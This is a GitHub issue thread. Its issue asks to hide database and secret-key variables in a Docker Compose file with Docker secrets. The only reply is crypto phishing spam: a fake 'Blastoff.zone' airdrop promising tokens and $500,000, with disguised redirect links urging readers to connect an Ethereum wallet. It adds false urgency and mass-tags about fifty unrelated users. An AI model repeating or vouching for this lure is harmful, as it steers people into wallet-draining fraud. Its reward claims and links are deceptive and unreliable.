### ISSUE TITLE
Hide Sensitive Data Using Docker Secrets

### ISSUE THREAD

**Issue by marka2g** [marka2g/belly_bot#15]
Use Docker secrets to hide the values to the following variables in your
Docker Compose file: DATABASE_URL, POSTGRES_PASSWORD, and SECRET_KEY_BASE.

**Comment by masa2el** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
hardeepnarang10, @Quail004, @mjtpena, @oysterpack, @zhanghaifeng2020, @bariscangungor, @acherie, @yannhowe, @stock1218, @kangmini, @davidgonzalezfx, @hkingofsaga, @Ferret-san, @ok1a, @GopherJ, @theluxaz, @mirzap, @vanderw, @bhatti, @tpedelose, @jabacchetta, @janjanEnjoy, @c03070, @ivpusic, @Slavaa00, @taoso, @thoniorf, @DaMandal0rian, @codeaudit, @tjanson, @dalvinderjitsingh, @abdulbari149, @yashvadhvani, @chenkuochou, @rubo, @ferasbg, @SoggyPaperHands, @fpgaq, @crisgarner, @MCNQ, @RaffaeleMorlando, @sheen-yan, @raahelpie, @WTNO, @vincentpc, @daviddahl, @seungjulee, @mazenkhalil, @PatoSF, @antiquatedicecream
